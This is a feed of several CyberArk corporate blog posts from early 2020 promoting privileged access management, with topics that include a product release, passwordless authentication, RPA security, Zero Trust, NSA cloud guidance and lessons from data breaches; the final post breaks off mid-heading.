The Enterprise’s mission, “to boldly go where no man has gone before,” surely resonates with modern day enterprises charting a course through the digital economy. These businesses rely today on technology networks linked by privileged access pathways to drive results – and like the Starship Enterprise, they sometimes come under attack. Our vision at CyberArk is to help our customers reduce risk by securing their enterprise through privileged access management (PAM), as leaving privileged pathways unprotected would be “highly illogical” in the words of Mr. Spock.

Version 11.3 of the CyberArk Privileged Access Security Solution introduces several new features to improve PAM flexibility, efficiency and security to help our customers live long and prosper.

New enterprise-ready enhancements and capabilities in Version 11.3 include:

  • Support for More Distributed Vaults: CyberArk now allows customers with multiple data centers to deploy Digital Vaults in up to six geographic locations (up from the previous limit of 4 Vaults) in a single Distributed Vaults environment. This allows global enterprises to increase availability on the data center level, enabling secure operations across the fleet.
  • Improved Automation Capabilities: Version 11.3 introduces PAM automation capabilities, including:
    • Fully automated upgrades to key CyberArk infrastructure using deployment tools such as Ansible, which allows for less focus on system maintenance.
    • Version 11.3 now supports concurrent logins for applications using the CyberArk REST API, enabling key applications to authenticate multiple times to CyberArk and notably improving the efficiency of automated PAM tasks.
    • Improved import and upload of Privileged Session Manager for Windows connection components via REST API.
  • Improved Threat Analytics Features for Audit and Compliance: Version 11.3 introduces new configuration options and details on risky privileged sessions detected by threat analytics, improving user experience for anyone focused on audit processes. The new features offer additional visibility into risky privileged behavior, providing additional intelligence regarding both malicious insiders and external threats.
  • Endpoint Privilege Manager Enhancements: Endpoint Privilege Manager now offers policy recommendations based on industry best practices for both macOS and Windows devices based on customer environment data and specific event statistics. This facilitates quick and easy implementation of least privilege, application control, and ransomware protection to protect endpoint security.
  • Support for Windows Server 2019: The CyberArk Core Privileged Access Security Solution can now be installed on Windows Server 2019, helping enterprise customers modernize and secure state-of-the-art infrastructure and applications in their hybrid cloud environments.

CyberArk Docs, our online documentation site, now hosts a centralized, simplified REST API Hub to collect information and share best practices for PAM automation across CyberArk customers.

In both Star Trek’s futuristic world and today’s cyber landscape, advanced human and alien (or at least non-human applications and machines) threats hide around every corner. The foundation of the USS Enterprise’s success was not only powerful, automated technology capable of adapting to sophisticated attacks, but also an insightful crew with the bandwidth to operate that technology effectively. New features in  version 11.3 expand the intelligence and flexibility of enterprise-grade PAM deployments to ready organizations for their digital transformation voyages.

Want to learn more? Contact us for a demo and learn why over 5,300 customers trust CyberArk to deliver comprehensive privileged access management functionality across the galaxy (or at least planet Earth) while delivering a simplified experience to security, operations and end users.

]]>
A Brief History of Securing the Hybrid Cloud https://www.cyberark.com/blog/a-brief-history-of-securing-the-hybrid-cloud/ Tue, 03 Mar 2020 14:00:42 +0000 https://www.cyberark.com/?p=86693 Privileged Access Management and Hybrid Cloud

More and more organizations are getting on board with infrastructure as a service and the hybrid cloud and it looks like that trend is only accelerating this year. As hybrid cloud environments become more prevalent, it’s time to look back at the evolution of cloud computing – and, more importantly, how to secure these dynamic environments.

In the early 2000s, Amazon, an e-commerce company going through rapid growth, needed its IT environment to be capable of handling the seasonal and massive fluctuating demands on its IT resources. For most e-commerce companies, consumer demand typically spikes in November and December. Amazon took it upon itself to create a solution to address its dynamic demand and resource needs; that solution was Amazon Web Services (AWS).

Following its launch in 2006, AWS outpaced Amazon’s operating income and tripled in revenue over the next two years. Thus, the public cloud computing market was born. Following Amazon, Google launched the Google App Engine in 2008 – which became Google Cloud Platform in 2008 – and Microsoft Azure launched in 2010.

Oftentimes independent groups or business units within an organization choose different public cloud providers to meet their particular requirements including the need for flexibility to support multiple business lines and geographies. Consequently, organizations use services hosted across multiple public cloud, private cloud and on-premises infrastructure, resulting in hybrid environments.

According to the RightScale 2019 State of the Cloud Report, over half of respondents – 54% — have a hybrid cloud strategy. Furthermore, organizations leverage almost five clouds on average. Beyond this, companies leverage Software as a Service (SaaS) applications and Platform as a Service offerings all of which need to be accessed by multiple types of privileged users, expanding the landscape that needs to be secured and increasing the pressure on security teams.

Security in public clouds is a shared responsibility between the public cloud vendor and the organization. Cloud vendors are committed to the security of the cloud infrastructure, including the compute, storage and networking resources, as well as the physical infrastructure. However, the application owner is responsible for protecting the applications, data, OS and other enterprise infrastructure, as well as other assets running in the cloud.  Application owners can’t afford to forget that the security of these elements in the cloud is in their hands.

To protect the cloud environment, start by ensuring that the right users – and only the right users can access only the applications, the cloud infrastructures, the cloud platforms and only when they need them. The same is true for hybrid cloud environments – except that those same security measures that keep the cloud safe need to work for both and on-premises environments without slowing anyone down.

 

Privileged Access Management (PAM) and Hybrid Cloud Options

When it comes to securing hybrid environments, enforcing the same privileged access security polices across the entire organization, regardless of the infrastructure environment, platform or SaaS application, enhances adoption by easing security policy management. In other words, the same privileged access management (PAM) policies and just-in-time access need to be equally enforced throughout every public, private and on-premises environment for every privileged user. CyberArk delivers solutions that enforce consistent enterprise-wide security policies across cloud and hybrid environments.

Want to learn more about how to secure the cloud journey? Learn how CyberArk protects cloud workloads or watch a webinar on best practices for securing cloud based applications and infrastructure.

]]>
Can We Really Make the World a Passwordless Place? https://www.cyberark.com/blog/can-we-really-make-the-world-a-passwordless-place/ Tue, 25 Feb 2020 19:19:25 +0000 https://www.cyberark.com/?p=86462

The average person uses around 100 username and password combinations. However, while many security teams recommend business users create individual, complex and strong passwords for all their accounts, many fail to follow this advice. As a result, many passwords are either weak or frequently re-used. With, the vast majority of cyber attacks involving compromised credentials – weak passwords can directly result in data leaks, cyber attacks and theft of intellectual property.

Try this for a password – the world’s longest place name, a hill in New Zealand with 85 letters.

In fact, malicious attackers can access millions of leaked passwords on public sites.  Having a password compromised is upsetting, but what’s more concerning is the longer-term impact of that attack.  Most people are guilty of re-using passwords, but if your email was infiltrated, for example, and you use that password for other online accounts, all of them can be compromised too.

Once compromised or stolen, credentials can be sold online and attackers count on the fact that most of us re-use our passwords. A purchased password for one account  is often used in other attacks to access valuable information on other sites.

On the other hand, tactics like phishing expose a clear “people” problem. According to the Verizon 2019 Data Breach Investigations Report, 32% of all breaches involved phishing and 33% included social engineering attacks that deceive human users.

Increasing Security with Authentication

Two-factor authentication (2FA) and multifactor authentication (MFA) were introduced to overcome these password-related security limitations. Both methods ensure that a person’s identity is authenticated using both something they know (the password) and something they have (such as an app on their phone or a form of biometric authentication like a thumbprint.) Even if a password is compromised, attackers still need another factor to gain access.

While these methods reinforce security, there are still some administrators and operations leaders who worry that the additional steps can get in the way of productivity.  This is especially true today in the world of developers and cloud architects who rely on speed and agility. The problem is that the access those developers and architects have is too critical to be left vulnerable.

Since they have having access to valuable secrets and full control over their environments, developers and architects are some of the most privileged users within an organization. Compromising a developer is a shortcut for attackers to gain immediate elevated access to the most critical information an organization has – hence the push for additional authentication.

While we always recommend using MFA when accessing critical systems, without the proper management and monitoring, passwords or credentials can still be a weak link. Storing and rotating credentials in a digital password vault or credential manager is another key method for organizations to solve the ‘people’ problem, as it prevents password re-use.

In addition, organizations are also facing high stakes and complex challenges from non-password credentials including SSH or Cloud API keys and DevOps secrets that provide access to different systems and applications. Credential vaulting and rotation prevents re-use, while also eliminating the challenges of manual credential management.

Securely granting access to different servers on-premises, different cloud providers, and most importantly, staying compliant with regulations is not an easy task. Especially when security leaders need to make sure that the business keeps working and security does not interfere with user activity.

The question then becomes: Is there an easy way to authenticate without remembering a password – and – is there a way to secure authentication while keeping the process simple?

Enter: Passwordless Authentication

‘Passwordless’ does not mean that passwords cease to exist; it simply means that end-users and application accounts are not exposed directly to the credentials needed to access critical systems. The goal of passwordless authentication is to improve security and make it more convenient and simpler for users to access resources.

With passwordless authentication, users do not need to memorize or enter passwords to log in to applications. Instead, access is granted according to user permissions or something that can’t be obtained by anyone other than the correct user, such as a biometric identification. If a password is never exposed to the user, then that password can never be stolen and, since endpoints are some of the most difficult systems to fully secure, this is a sound strategy.

Personal user passwords can be protected using passwordless methods and several are growing in popularity like Windows Hello and FIDO compliant web sites and devices.

With this approach, IT and Security teams can rest assured that user access is secured and there are no reused or shared passwords and, therefore, attackers can’t phish for users’ passwords or access. User authentication data is never stored within the system as a password would be, so even someone with access to the system can’t retrieve the authentication data – giving passwordless solutions a key security advantage.

This addressess the problem of protecting assets from sophisticated cyber attacks involving credential harvesting, which commonly start with phishing attacks or using a weak or re-used password. The end result is a positive user experience and strong security.

Passwordless Authentication and Privileged Access Management (PAM)

We’ve established that passwordless can be great for personal user passwords, but, what about securing access to extremely sensitive assets? How can businesses grant passwordless access to the root account of a newly provisioned machine or a service account running mission critical services?

These forms of privileged access represent the greatest risk to organizations and need even stronger security controls than an ordinary passwordless tool can provide. Access to tier 1 and tier 0 systems, which contain the most privileged assets in an organization, should be protected with a comprehensive Privileged Access Management (PAM) solution. These solutions can vault and isolate credentials so users never know them – making them passwordless – but, also provide additional layers of security like session monitoring, recordings and analytics-based threat detection.

How can organizations tier access between personal users, tier 1 admin users and tier 0 systems?

While, personal user passwords can be protected using standard passwordless methods, organizations should protect their service accounts, admins and non-human identities with stronger, dedicated solutions. However, whether securing access to critical information or authenticating individual users, the basic rules remain the same:

  • The user shouldn’t know the password.
  • The user should have a simplified streamlined experience.
  • Secrets should be protected and properly rotated.
  • Access to these secrets should be secured and monitored.

This approach can get us closer to a world where passwords (or keys) are not the weakest link anymore – a passwordless world, a more secured world.

Wonder how this can be achieved?

Check out the CyberArk Privileged Access Security Solution for more details or learn more about CyberArk Alero, our newest offering, which provides native, passwordless authentication for remote users.

]]>
CISO View Insights: Securely Scaling RPA Initiatives https://www.cyberark.com/blog/ciso-view-insights-securely-scaling-rpa-initiatives/ Wed, 19 Feb 2020 13:50:31 +0000 https://www.cyberark.com/?p=86287 RPA Security

According to a recent Deloitte study, robotic process automation (RPA) continues to meet and exceed expectations across multiple business dimensions including improved compliance (92%), improved quality and accuracy (90%), improved productivity (86%) and reduced costs (69%).

But from a cybersecurity perspective, RPA represents a new and attractive attack surface for external attackers and malicious insiders. RPA technologies—and the humans who control them—are often given broad privileged access to highly sensitive data and a variety of business critical applications that open up the enterprise to unnecessary risk. And yet, according to our threat landscape survey, less than half of organizations have a privileged access management (PAM) strategy in place for digital transformation technologies like RPA.

If you’re a security leader grappling with the challenge of how to provide robots with privileged access while safeguarding the business, this report is a must-read. Regardless of where you are in your RPA journey—from planning to implementation to extending use cases—this new CISO View report can help accelerate efforts to enable automation while effectively managing the risks. Learn more by watching the video below.

CyberArk, in conjunction with independent research firm Robinson Insight, has assembled an expert panel of Chief Information Security Officers (CISOs) from the world’s leading organizations to examine attack techniques, provide insights on why organizations often underestimate the risks of RPA-related privileged access and share practical guidance on reducing RPA risk based on their first-hand experiences.

Here are some of their recommendations.

Five Top CISO Recommendations for Securely Driving Innovation through RPA

  1. Be proactive in setting security standards for RPA initiatives. Understandably, organizations are eager to get started with RPA as part of their push toward digital transformation, but security cannot be an afterthought—it must be built in from the start.
  1. Strictly limit access for reprogramming robots. Anyone with the right combination of permissions in the RPA tool can reprogram robots—and potentially cause major issues.
  1. Automate management of credentials used by robots. At the scale and speed of robotic processes, it’s nearly impossible to manage privileged credentials manually.
  1. Establish robust processes for monitoring RPA activity. A compromised robot can do lot of damage—and fast.
  1. Focus conversations with stakeholders on business opportunities and efficiency. Implementing an RPA security strategy will require stakeholder involvement across the enterprise.

Protecting Privileged Access in Robotic Process Automation

These five recommendations form the foundation of a playbook for benefiting from the opportunity of RPA while keeping privileged access protected. These are just a few of the many insights and actionable recommendations for security leaders found in the fourth CISO View report.  On many RPA topics, CISOs on this research panel were in broad agreement. For other issues, this report captures diverse points of view, reflecting varying stages of RPA deployment and a range of organizational cultures.

Members of the RPA CISO View research panel include Global 1000 organizations such as Asian Development Bank, GIC Private Limited, Highmark Health, Kellogg Company, Lockheed Martin Corporation, Orange Business Services, Pearson, Rockwell Automation, Royal Bank of Canada and T-Systems International.

The full CISO View series brings together leading CISOs for peer-to-peer information sharing to help security teams build effective cybersecurity programs.

Learn More: Download the Report and Explore RPA Security Resources

]]>
SOC It 2 Me: CyberArk Achieves SOC 2 Type 2 Compliance https://www.cyberark.com/blog/soc-it-2-me-cyberark-achieves-soc-2-type-2-compliance/ Tue, 11 Feb 2020 17:40:40 +0000 https://www.cyberark.com/?p=85878

Service Organization Control (SOC) 2 is an auditing procedure that ensures service providers are securely managing data to protect the interests of their customers, their customers’ customers and so on. This stringent independent audit seeks to determine the suitability of the design and operating effectiveness of controls that a SaaS vendor implements for its services.

As we continue to bolster and enhance our best-in-breed Privileged Access Management (PAM) as a Service portfolio, we are proud to announce that CyberArk recently attained SOC 2 Type 2 compliance for both Endpoint Privilege Manager and CyberArk Privilege Cloud.

This is a momentous accomplishment and here’s why. The audit tests over 30 unique controls, principles and criteria. These include, but are not limited to, overall commitment to organizational integrity, ethical values and, of course, specificity into how data is controlled and secured. SOC 2 is a comprehensive audit that signifies to the market that complying organizations take the data privacy of their “as a Service” offerings seriously.

Other market solutions that fall back on major cloud hosting providers like AWS, Azure and more to claim SOC 2 compliance are not as mature or secure as services that have obtained these certifications independently. CyberArk has always been committed to providing customers with the most secure solutions to fit their needs and achieving SOC 2 Type 2 compliance is another proof point for that mission.

Part of the CyberArk PAM as a Service portfolio, Endpoint Privilege Manager (EPM) helps organizations reduce the risk of unmanaged administrative access on Windows and Mac endpoints. It provides the right tools to implement the principle of least privilege and helps to effectively reduce the attack surface and transparently mitigate the risk of a data breach without impacting productivity. EPM combines privilege management, privilege threat protection and numerous integrations to reduce the risk of malware infection and lateral movement without having adverse impacts on IT and security teams.

CyberArk Privilege Cloud is built to protect, control and monitor privileged access across cloud and hybrid environments. Based on CyberArk’s extensive experience protecting privileged access, the solution helps organizations efficiently manage privileged account credentials and access rights, proactively monitor and control privileged account activity and quickly respond to threats – all without the need to manage additional on-premises infrastructure. This modern, cloud-based service accelerates time-to-value and leverages cloud economics to efficiently and effectively address customers’ privileged access management needs.

The recent SOC 2 audit indicates that organizations can leverage CyberArk services’ controls and design to operate effectively. The audit also confirms that these two services operate effectively and have the requisite service commitments and system requirements based on the “applicable trust services criteria” — making them viable options for any organization looking to use CyberArk as a Service offerings. As organizations continue to trend towards SaaS applications and security solutions, SOC 2 compliance for specific services can be a starting point in evaluating SaaS providers.

Learn more about Privilege Cloud and Endpoint Privilege Manager now.

]]>
Preventing Interceptions in the Cybersecurity Super Bowl https://www.cyberark.com/blog/preventing-interceptions-in-the-cybersecurity-super-bowl/ Tue, 04 Feb 2020 17:27:48 +0000 https://www.cyberark.com/?p=85146 Cybersecurity Super Bowl

Few events can change the momentum of a football game like a turnover in a critical moment. Unfortunately, ahead of their clash in last Sunday’s Super Bowl, the Kansas City Chiefs and San Francisco 49ers had one such moment when cyber attackers took over the teams’ Twitter accounts as well as the official account of the National Football League.

The group OurMine took responsibility for the cyber attack. In all, 15 NFL teams had their Twitter or Instagram accounts compromised alongside the accounts for Sports Media Giant ESPN and the UFC mixed martial arts organization. The Super Bowl is the biggest event on the American sports calendar; so it’s not surprising that precisely during their moment in the spotlight, the NFL, the Chiefs and the 49ers were attractive targets for attackers seeking a spot on that national stage by causing disruption.

The attacks emphasize the importance of cybersecurity for social media accounts and other web applications, not only for sports teams and media companies, but any organization. Once in control of team accounts, the attackers spread misinformation about individual teams. Meanwhile, media reports of the attacks spread widely and the NFL and ESPN felt the need to issue public statements confirming they were working with law enforcement to address the situation.

While the precise attack methodologies are not fully public, both OurMine and Twitter confirmed the data breach occurred through a third-party platform. This reinforces awareness that, as adoption of web and cloud applications expands, so too does the attack surface.

With the prevalence of unmanaged, unmonitored and, often, shared accounts and passwords, many organizations lack proper controls over social media platforms. Yet, a compromised account can be potentially catastrophic to a brand’s reputation and that needs to be taken into consideration. Attacks can lead to the unauthorized publication of offensive content, or leaks of confidential financial or personal information.

Social media account credentials should be securely stored, rotated and isolated from employee workstations to minimize these risks. Session isolation and management can add additional accountability to privileged sessions on corporate accounts, helping security teams satisfy audit requirements and investigate security events.

The role of a third party social media management application in these breaches is even more of a concern. These applications should be treated as highly-sensitive corporate resources. As such, they should be secured with privileged access management solutions, which provide security where it’s most needed – protecting highly sought after privileged access to vital information and applications from compromise.

Football, it’s often said, is a game of inches, in which the difference between winning and losing comes down to just a few key moments. To win a close game, teams must ensure they limit unnecessary turnovers that can give opponents momentum or the upper hand. The same could be said for cybersecurity. When facing complex threats, organizations should take a risk-based approach and prioritize privileged access management.

Looking to change the game and better protect your organization from threats? Learn how to execute the playbook for privileged access management.

]]>
The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device. https://www.cyberark.com/blog/the-one-two-punch-of-zero-trust-verify-every-user-validate-every-device/ Sun, 02 Feb 2020 20:56:46 +0000 https://www.cyberark.com/?p=98931

Date breaches most often originate from a remote endpoint or device that shouldn’t have access to the breached resources in the first place — often involving nothing more than a stolen username and password. Wouldn’t it be nice if we could reduce the attack surface from  every computer or device on earth to only the protected systems that should have access in the first place? That may sound like a pipe dream, but the reality might be closer than you think with the right setup.

As I wrote before, security starts with protecting users. First, we must verify every  user to make sure we know who they are and that they only have access to what they need. This verification is done through adaptive multi-factor authentication and tools like single sign-on, coupled with behavior-based machine learning that can make intelligent access decisions in real-time based on user context and risk. . With that in place, we’ve already dramatically reduced the attack surface so that an attacker who has a stolen password can’t simply log in from anywhere, or reuse that same login credential over and over again.

Verifying every user is an important first step. However, after that, the challenge remains that there are still many  ways that applications, systems or networks can be compromised. Anyone with the right credentials can still successfully log on. What happens when a bad guy has acquired both the user’s login credentials and a clone of the user’s device, as is the case with the phenomenon of SIM-swapping? MFA alone may not protect against that scenario.

So how can you take your security posture to the next level to protect against this? The answer is simple. If “verify every user” represents your leading left hand jab, then “validate every device” is the follow-up right cross of a Zero Trust strategy. Here’s how to master the Zero Trust one-two punch combo to land a devastating blow to the bad guys’ chance of breaking through your guard.

Come out swinging when it comes to device context and security

Everything online typically comes from accessing a device, so we should care a lot about the security posture and permissions that each device has. Organizations wouldn’t want some rogue server operating on their network, so why then a rogue mobile device or laptop?

But understanding every computer or mobile device that might have access is becoming increasingly difficult in a world where our professional and personal lives are more intertwined than ever before. We use our personal laptops, smartphones, and tablets to access work apps or emails after hours and at home, on the road, or even 30,000 feet in the air. To suddenly cut-off that access for pre-authorized, work-issued devices would be a huge knock to users’ productivity. That’s where the Zero Trust model comes in.

Instead, we want to make sure that every device is being used in a secure manner. It should have a screen-lock policy enforced, , and proper credentials – because we don’t want passersby or someone who steals the device to use that, get in, and establish repeatable access. Configure device access to reflect best practices – each device should only do what it needs to do. This is done through device management capabilities, which many companies have tried to buy for each system. However, a  next-gen access approach integrates these capabilities into the system so that we know good security policy is always baked into each and every device that gains access.

Roll with the punches using next-gen access

Once we know that a device has the right security posture and the user is the real deal, this can be used as a proxy for all sorts of context. User behavior thus becomes a powerful new technique to make smarter access decisions.

Today, Zero Trust empowered by next-gen access technology (like Idaptive) can use location or other behaviors to determine whether to grant instant access or introduce additional hurdles to confirm their identity. In the future, we’ll be able to use even more behaviors of the user on the device for context – such as whether they’re typing at a normal pace or moving their mouse as they usually do. This is called behavioral biometrics, and is important because it could tell whether the person using the device is real, and make sure it’s not a rogue virus or trojan that has taken the machine or is pretending to be the user.
All of these add up together to whether we can trust the device, and trust the user on the device, and therefore allow it to have the access that it’s requesting. Recently, this has been much more difficult to do because the modern business is no longer a bunch of PCs chained to a desk in a room. All workers today have laptops and their own mobile devices, and try to access things remotely. We even have people other than direct employees – such as partners, other vendors or third-party consults – that all need access to our apps and services as well. That complexity requires a system that makes sure what is let in is both 1) in good security posture, and 2) used by the right people.

In our modern threatscape, the barriers to keep the bad guys out are no longer firewalls. Resources are increasingly located outside of physical walls in the cloud, off-site databases, or partner systems. There’s no longer the ability to put a security barrier on a remote SaaS system your organization doesn’t own, or to restrict access to only a predetermined set of devices.

Because our apps, services, and systems are so widespread, we need to spread access control to users and their devices. That means making sure we verify every user and validate every device with every login. That’s the one-two punch of Zero Trust.

Stay tuned. In my next blog post, I’ll spell out the ways that an organization can “intelligently limit access” within the Zero Trust framework.

Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
NSA Offers Guidance for Improving Cloud Security https://www.cyberark.com/blog/nsa-offers-guidance-for-improving-cloud-security/ Thu, 30 Jan 2020 21:21:42 +0000 https://www.cyberark.com/?p=84982 Cloud Security

Last week, the US National Security Agency (NSA) released new guidance on mitigating cloud vulnerabilities to help organizations as they consider and deploy public cloud services.

We’ve been talking about the importance of cloud security for quite some time now but following a string of highly publicized cloud-related attacks, this guidance comes at a critical time. The core of the NSA document is that organizations must consider cyber risks to cloud resources, just as they would in an on-premises environment – including how they approach privileged access management.  This message reinforces our long-held view that no matter where they “live” – on-premises or in the cloud – privileged accounts must be protected.

While the NSA’s recommendations focus solely on cloud-native environments, most enterprises today operate in a hybrid environment – with some workloads on-premises and others in the cloud. The NSA guidance itself provides valuable insights into securing cloud environments, but this guidance should always be considered as part of a holistic approach to security.

That being said, let’s dig into the NSA’s recommendations.

Security Guidance for the Public Cloud

The NSA delves into four cloud architectural services common to most public clouds – identity and access management (IAM), compute, networking and storage. It describes how many organizations are turning to these cloud services, but cautions that cloud adoption introduces a host of new risks that must be understood and addressed. It places strong emphasis on the shared responsibility between organizations and cloud providers in protecting applications, data, and other sensitive information in the cloud.

The shared responsibility model illustrates that, while cloud providers are responsible for the cloud infrastructure, organizations are still accountable for the security of certain services and sensitive data stored in public clouds, such as configuration, applications, data and environments.

To shed some light on the most common risks, the NSA categorizes cloud vulnerabilities into four main groups– misconfiguration, process access control, shared tenancy vulnerabilities, and supply chain vulnerabilities.  These groupings take into account both how often these vulnerabilities occur and how sophisticated a cyber attacker has to be to take advantage of them.

Misconfiguration

One of the most prevalent vulnerabilities in cloud environments today, misconfigurations offer attackers the path of least resistance and so require very little in terms of sophistication from the attacker.  These misconfigurations often arise from either policy mistakes or misunderstanding of the security responsibilities on the organization’s side.

These misconfigurations can result in several issues from denial of service to account compromise. If an attacker can abuse a misconfiguration to compromise a single privileged user, for example, they will use these credentials to compromise a cloud management console or – worse — ultimately take over control of the organization’s cloud environment.

Poor Access Control

These attacks almost always involve privileged access. The prevalence of this attack is widespread and it requires only moderate sophistication from the attacker. They look for opportunities to exploit weak authentication and authorization methods.

Once they gain a foothold, attackers will start to escalate privileges, move laterally through the environment, and, ultimately, compromise as many cloud resources as possible. For example, an attacker can bypass multi-factor authentication (MFA) by evoking a password reset where only single-factor authentication is required to reset credentials.

 Shared Tenancy Vulnerabilities

Adversaries who are able to determine which software and hardware components are used in a public cloud hypervisor could take advantage of vulnerabilities to elevate privileges in the cloud. The NSA directive notes that while there have been no reported compromises in any major cloud computing platform, security researchers have demonstrated both hypervisor and container breakouts.

A recent example of this was CVE-2019-1372, where the attacker could remotely execute code, bypassing the sandbox, and CVE-2019-1234 where attackers could make requests to the internal Azure Stack resources.  Both examples here have since been addressed.

Supply Chain Vulnerabilities

Supply chain vulnerabilities in the cloud include attackers inside the supply chain and backdoors intentionally installed in hardware and software.  While infiltrating the supply chain is not usually an attacker’s ultimate goal, if the attacker can get the cloud provider to install hardware with a backdoor, it makes all other controls useless.

However, as we noted previously, cyber attackers will almost always seek the path of least resistance to carry out their mission. That usually involves abusing misconfigurations or privileged access instead of turning to highly sophisticated methods such as inserting an agent into the cloud supply chain.

At the end of the day, securing cloud instances is an ongoing challenge.  The guidance offered by the NSA is helping to demystify some of this and – maybe even more importantly – provide prioritization to the most susceptible areas so organizations know where to optimize their security resources.

At CyberArk, our goal is to help enterprises protect their assets and workloads wherever they exist – including in the cloud. We believe the NSA has taken an important step with this directive to not only raises awareness about security in the cloud and the importance of protecting privileged access, but also supports productive conversations about shared responsibility.

With the CyberArk Privileged Access Security Solution, we help companies continuously discover privileged accounts as they are created and isolate privileged user sessions to protect cloud and on-premise critical systems while speeding up the onboarding process and consumption of these credentials.

Want to learn more?  Check out our eBook, “6 Key Use Cases for Securing Your Organization’s Cloud Workloads” and explore our cloud security resources.

 

]]>
Data Privacy Day: Data Protection Lessons from the 2010s https://www.cyberark.com/blog/data-privacy-day-data-protection-lessons-from-the-2010s/ Tue, 28 Jan 2020 14:00:55 +0000 https://www.cyberark.com/?p=84805 Data Privacy and Data Protection

Today is “Data Privacy Day” – and while it seems like there is a day for nearly everything we hold dear (hello national grilled cheese day!), this particular date commemorates the 1981 signing of the first legally binding international treaty on data protection.

Data protection standards have come a long way since 1981, especially in the last couple of years with GDPR and CCPA – two regulations that extend the rights of individuals to better control and protect the use of their personal data in the evolving digital landscape. It’s generally believed that GDPR and CCPA are laying the foundation for further groundbreaking regulations.

And it makes sense.  According to Business Insider, “of the 15 largest data breaches in history, 10 took place in the past decade.”  These breaches collectively resulted in the loss of nearly 4 billion records.   So, as we embark on a new decade, let’s take a look at some of the data breaches of the 2010s that helped shape stricter consumer data protection.

2016

Uber Breach – While it was disclosed in 2017, Uber suffered a breach in 2016 that exposed personal information belonging to 57 million drivers and customers. Attackers stole names, email addresses and phone numbers and demanded a $100,000 ransom.  To add insult to injury, Uber also was fined nearly $150 million for not disclosing the breach earlier.

Lesson Learned?  Don’t store code in a publicly accessible database. Uber data was exposed because the AWS access keys were embedded in code that was stored in an enterprise code repository by a third-party contractor.

2017

 Equifax Breach – Several tech failures in tandem – including a misconfigured device scanning encrypted traffic and an automatic scan that failed to identify a vulnerable version of Apache Struts – ultimately led to a breach that impacted 145 million customers in the US and 10 million UK citizens.

Lesson Learned?  Get security basics right. Despite cyber attacks becoming more targeted and damaging, organizations are frequently still ignoring the security basics. Patches need to be applied promptly and security certificates need to be maintained. This breach also inspired elected officials to push for legislation to tighten regulations on what protections are required for consumer data and influenced an increase in executive accountability.

2018

Facebook’s Cambridge Analytica Breach – Cambridge Analytica, a British political consulting firm, harvested the personal data from millions of peoples’ Facebook profiles without their consent and used it for political advertising purposes. The scandal finally erupted in March 2018 when a whistle blower brought this to light and Facebook was fined £500,000 (US$663,000), which was the maximum fine allowed at the time of the breach.

Lesson Learned?  Protect user data (or pay up). Lawmakers claim Facebook “contravened the law by failing to safeguard people’s information” – and suffered the consequences. Now the United States Congress is placing additional pressure on Facebook to stop the spread of fake news, foreign interference in elections and hate speech (or risk additional, larger fines).

2019

Ecuador Breach – Data on approximately 17 million Ecuadorian citizens was exposed due to a vulnerability on an unsecured AWS Elasticsearch server where Ecuador stores some of its data.  While the sheer scale of this breach made it headlines news, the breadth of exposed information really made everyone stand up and take notice. Exposed files included official government ID numbers, phone numbers, family records, marriage dates, education histories and work records.  In addition, a similar Elasticsearch server exposed the voter records of approximately 14.3 million people in Chile, around 80% of its population.

Lesson Learned?  Adhere to the shared responsibility model. Most cloud providers operate under a shared responsibility model, where the provider handles security up to a point and, beyond that, it becomes the responsibility of the customer.  As more and more government agencies look to the cloud to help them become more agile and better serve their citizens, it’s vital they continue to evolve their cloud security strategies to proactively protect against emerging threats – and reinforce trust among the citizens who rely on their services.

Desjardins Breach — The data breach that leaked info on 2.9 million members wasn’t the result of an outside cyber attacker, but a malicious insider – someone within the company’s IT department who decided to go rogue and steal protected personal information from his employer.

Lesson Learned?  Be proactive in identifying unusual or unauthorized behavior. While insider threats can be more difficult to identify, especially in a case where the user has legitimate privileged access rights, it’s important to be able to consistently monitor for unusual and unauthorized activities.  Even more critical is the ability to automatically remediate potentially risky behavior (think: putting a temporary hold on permissions) to help reduce the amount of time it takes to stop an attack and minimize data exposure. This breach showed that a defense-in-depth security strategy that includes privileged access management, multi factor authentication and database activity monitoring has never been more crucial.

These incidents are just a small sample of the numerous data breaches that occurred in the 2010s.  Any organization that collects or stores customer information can learn from these incidents and the many more like them.  Not prioritizing data protection or simply doing the bare minimum can lead to regulatory non-compliance fines, or worse – the destruction of customer confidence and brand damage. Listening to the lessons of the past can help us prepare for a more secure future.

]]>
Why the Federal Government Should Trust in Zero Trust https://www.cyberark.com/blog/zero-trust-for-the-federal-government/ Tue, 21 Jan 2020 18:00:45 +0000 https://www.cyberark.com/?p=84156

Digital transformation isn’t just for businesses – organizations everywhere including the federal government are getting on board. Take, for instance, the Pentagon’s $10 billion JEDI Contract, which gives Microsoft the right to provide enterprise level platform as a service (PaaS) and Infrastructure as a Service (IaaS) to the Department of Defense – a key element of the Pentagon’s ongoing work to modernize its infrastructure. While this is just one of many examples of digital transformation efforts happening in the federal sector, the mission is the same – to interconnect and scale operations.

However, while modernization initiatives are great for efficiency and can offer citizens new services, these efforts can also increase the attack surface – potentially opening up new points of vulnerability.

Why the Need for a Zero Trust Framework?

